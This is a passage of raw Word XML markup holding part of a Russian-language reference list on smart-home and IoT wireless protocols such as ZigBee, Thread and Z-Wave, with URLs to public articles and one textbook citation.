          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t>Протоколы связи для "умного дома"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:anchor="Wi-Fi" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>https://www.ferra.ru/ru/digihome/review/SmartHome-Protocols/#Wi-Fi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0044023C" w:rsidRPr="0044023C" w:rsidRDefault="0044023C" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="0044023C">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Язык» для умного дома: как будут «общаться» устройства домашней электроники и почему им нужен один протокол?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.forbes.ru/tehnologii/344713-yazyk-dlya-umnogo-doma-kak-budut-obshchatsya-ustroystva-domashney-elektroniki-i</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0044023C" w:rsidRPr="0044023C" w:rsidRDefault="0044023C" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0044023C">
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> - современные телекоммуникационные технологии. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="0044023C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.lessons-tva.info/articles/net/013.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0044023C" w:rsidRDefault="00393F36" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F36">
        <w:t>бзор протоколов беспроводной связи для Интернета вещей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393F36" w:rsidRDefault="00393F36" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим доступа:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://iot.ru/promyshlennost/obzor-protokolov-besprovodnoy-svyazi-dlya-interneta-veshchey</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F00A9D" w:rsidRPr="003802F9" w:rsidRDefault="00393F36" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IoT Standards and Protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F36">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00393F36">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.postscapes.com/internet-of-things-protocols/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F00A9D" w:rsidRPr="00F00A9D" w:rsidRDefault="00F00A9D" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F00A9D">
        <w:t xml:space="preserve">Беспроводные сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wless</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>technology</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/?</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>tech</w:t>
        </w:r>
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00393F36" w:rsidRPr="00880DF7" w:rsidRDefault="00393F36" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393F36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THREAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>technology.</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>threadgroup</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>technology</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="00880DF7">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00F00A9D" w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ourtechnology</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F00A9D" w:rsidRPr="00F00A9D" w:rsidRDefault="00F00A9D" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>THREAD WIRELESS NETWORKING PROTOCOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.digi.com/resources/standards-and-technologies/thread-networking-protocol</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00393F36" w:rsidRPr="00F00A9D" w:rsidRDefault="00F00A9D" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Introduction to Z-Wave Specifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://zwavepublic.com/specifications</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F00A9D" w:rsidRDefault="00F00A9D" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEEE 802.15.3a Wireless Personal Area Networks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00A9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="007D0CA1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://ieeexplore.ieee.org/document/5755291/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve">Сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>habrahabr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t>/155037/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction to the ZigBee Wireless Sensor and Control Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ata </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elahi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Adam </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gschwender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Oct 29, 2009 by Prentice Hall. Part of the Prentice Hall Communications Engineering and Emerging Technologies Series from Ted Rappaport series.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Глава </w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>Protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B47356">
        <w:t>Architecture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B47356" w:rsidRPr="00B47356" w:rsidRDefault="00B47356" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve">Беспроводные сети </w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t>. Часть 1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B47356">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>habrahabr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>company</w:t>
      </w:r>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:u w:val="single"/>
